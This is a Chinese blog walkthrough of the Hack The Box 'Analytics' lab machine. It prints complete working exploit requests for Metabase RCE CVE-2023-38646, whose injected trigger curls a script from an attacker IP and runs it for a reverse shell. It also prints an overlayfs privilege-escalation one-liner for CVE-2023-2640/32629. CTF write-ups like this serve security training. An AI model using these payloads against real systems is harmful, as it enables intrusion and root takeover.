HTB-Analytics

最新推荐文章于 2024-07-20 22:27:15 发布
最新推荐文章于 2024-07-20 22:27:15 发布
阅读量393 收藏 7
点赞数 7
文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590615
版权

title: HTB-Analytics
date: 2023-12-14 12:54:18
categories: HTB
tag: 渗透

Analytics

信息收集

nmap扫描同时http访问

换上hosts

10.10.11.233 analytical.htb

Starting Nmap 7.93 ( https://nmap.org ) at 2023-12-14 12:55 中国标准时间
Nmap scan report for bogon (10.10.11.233)
Host is up (0.33s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 50.99 seconds

hosts换好后进行目录扫描

查看主页面有一个登录login进去后发现域名是

http://data.analytical.htb/

把hosts添加上

10.10.11.233 data.analytical.htb

查看到cookie是metabase服务

可以试试

Metabase 远程代码执行漏洞(CVE-2023-38646)
反弹shell

首先访问

http://data.analytical.htb/api/session/properties

得到token

"setup-token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",

在访问

http://data.analytical.htb/api/setup/validate

构造exp

在本地执行python -m http.server 80

并且写入一个2.sh

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('curl -o /tmp/2.sh http://10.10.14.54/2.sh')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

通过curl得到2.sh并且放在tmp文件夹下

在使用

POST /api/setup/validate HTTP/1.1
Host: data.analytical.htb
Content-Type:application/json
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: metabase.DEVICE=17645f70-ae73-4c86-a81c-ab6fdaa2ccf7
Connection: close
Content-Length: 741

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash /tmp/2.sh')\n$$--=x",
            "advanced-options": false,
            "ssl": true
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

反弹成功

在使用env可以得到metalytics的账号与密码

然后使用ssh进行登录

metabase里面没有什么内容

ssh连接后id显示1000

在目录下有一个flag

提权

使用sudo -l发现没有用

使用uname

Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux

查资料发现存在

CVE-2023-2640 and CVE-2023-32629

只需要使用

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;import pty;os.setuid(0);pty.spawn("/bin/bash")'

即可获取权限

c0iq
关注
  • 7
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTB Analytics WriteUp
qq_58869808的博客
10-08 3087
看见.dockerenv 存在.dockerenv 目录下,,感觉应该是在一个docker容器里面。简单收集了一波信息,没有可以利用suid,没有sudo -l ,尝试内核提权吧。发现新的子域名,所以马上尝试vhost碰撞,这也是是一个思路。虽然回显显示sql执行失败报错,但是实际命令是成功执行的。一眼看上去就感觉是一个组件类似的东西,google。经典两端口 22 80 ,80 重定向到。然后把这个子域名加入hosts文件。读取env的内容,存在用户和密码。这个也是ok的,就一个sh脚本。
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
HTB-Mango
TA不懒,但还没有添加简介
04-10 668
HTB-Mango
HackTheBox系列-Analytics
qq_43264813的博客
12-18 863
1、使用nmap进行端口扫描2、发现目标开放了两个端口,对22和80端口进行信息收集3、扫描发现80端口绑定着一个域名analytical.htb,将其添加到hosts文件中并使用浏览器访问4、对网页进行信息收集发现一个子域名data.analytical.htb5、目录枚举半天也没有发现什么,子域名爆破也没有爆破出来其它子域名6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名,发现是一个标题为Metabase的站。
Hack The Box-Analytics
分享
03-18 550
利用matebase的RCE漏洞进行反弹shell,再根据系统内核版本进行提权!总的来说没难度!
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
权威认可 | 海云安开发者安全助手系统通过信通院支撑产品功能认证并荣获信通院2024年数据安全体系建设优秀案例
haiyunan的博客
07-16 555
在“某省烟草数据安全体系建设规划”项目实践中,海云安基于双生命周期融合与零信任架构的总体思路,立足业务基于场景,通过建设技术、管理、运营三大体系,为公司构建了覆盖数据生命周期、应用生命周期的“数盾”,解决数据安全合规、风险管控、业务影响控制等问题,从而为公司打造一个安全可靠的数据使用环境,助力公司持续稳健发展。通过实施数据安全零信任架构,企业将显著提高数据安全性,减少数据泄露和网络攻击的风险,增强对复杂安全环境的应对能力,实现持续的安全保护和合规运营。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 592
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 816
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
全文翻译 | OWASP《LLM安全与治理检查清单》
lurenjia404的博客
07-17 820
本文是OWASP(开放式网络应用安全项目)发布的《LLM AI安全与治理清单》(以下简称“清单”),旨在为使用大型语言模型(LLM)的组织提供安全与治理方面的指导。清单强调了负责任和可信的人工智能(AI)的重要性,并指出AI技术,尤其是LLM,在创新、效率和商业成功方面具有巨大潜力,同时也带来了明显的挑战。文中讨论了LLM面临的挑战,包括控制和数据平面的不可分割性、非确定性设计、语义搜索的使用等,并强调了LLM增加的攻击面和相关风险。
园区道路车辆智能管控视频解决方案,打造安全畅通的园区交通环境
TSINGSEE青犀视频官方技术博客
07-16 845
AI智能分析网关V4消防通道占用算法基于人工智能视觉分析技术,通过摄像头实时监测识别是否有机动车违规停放在消防车通道上,并及时提醒管理人员进行处理。
防火墙--内容安全
最新发布
banliyaoguai的博客
07-20 371
内容安全是指对互联网上的内容进行监测、筛选和管理,以确保用户在浏览、使用互联网内容时的安全和合法性。各个厂商在进行内容安全的检测、分析和处理的过程被称为引擎。下面以华为IAE引擎来对内容安全进行学习ID:区分不同的签名对象:服务器,客户端。一般我们将发起连接的设备角色认定为客户端,响应连接并提供服务的角色认定为服务器。严重性:该行为一旦爆发之后,对我们网络系统的影响程度的评级协议/应用程序:这种攻击所承载的协议或者应用。
数据库安全审计系统:筑牢数据安全防线 提高数据资产安全
2401_82472120的博客
07-17 450
其可以监控和审计用户对数据库中的数据库表、视图、序列、包、存储过程、函数、库、索引、同义词、快照、触发器等的访问、创建、修改和删除等,分析的内容可以精确到SQL操作语句级别。另外,它还可以根据设置的规则,智能判断出违规操作数据库的行为,并对违规行为进行记录、报警。通过对用户访问数据库行为的记录、分析和汇报,来帮助用户事后生成合规报告、事故追根溯源,同时通过大数据搜索技术提供高效查询审计报告,定位事件原因,以便日后查询、分析、过滤,实现加强内外部数据库网络行为的监控与审计,提高数据资产安全
响应“一机两用”政策号召 提高政务内外网安全
Canon_YK的博客
07-17 911
随着一机两用政策的实施,即政府部门内部网络终端在特定情况下需同时连接政务内外网,如何在保证工作效率的同时,确保网络安全和数据安全,成为摆在面前的重要课题。未来,随着技术的不断发展和完善,沙箱技术将在政务内外网安全中发挥更加重要的作用。深信达的SDC沙箱技术已经和多个政企单位合作,高效便捷的沙箱技术已经大大提升了政务机关的内网安全,为政务机关业务的开展提供了强有力的安全保障。SDC沙箱技术能够对隔离环境中的网络行为进行实时监控和审计,包括网络连接的建立、数据的传输、应用程序的运行等。
保障低压设备安全!中国星坤连接器精密工艺解析!
weixin_50506145的博客
07-16 541
随着技术的发展,对连接器的需求也在不断提升,特别是在低电压应用领域。中国星坤最新推出的低压连接器,以其精密性和安全性,为低电压设备提供了一个可靠的连接解决方案。中国星坤的低压连接器,以其卓越的性能和广泛的应用前景,为低电压设备的安全稳定运行提供了有力保障。随着技术的不断进步和市场需求的增长,低压连接器将在更多领域展现其独特的价值,成为连接现代电子世界的可靠伙伴。:在医疗领域,低压连接器用于连接各种便携式医疗监测设备,确保数据传输的准确性和设备的稳定性。:由于设计简洁,连接器的维护和更换变得简单快捷。
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值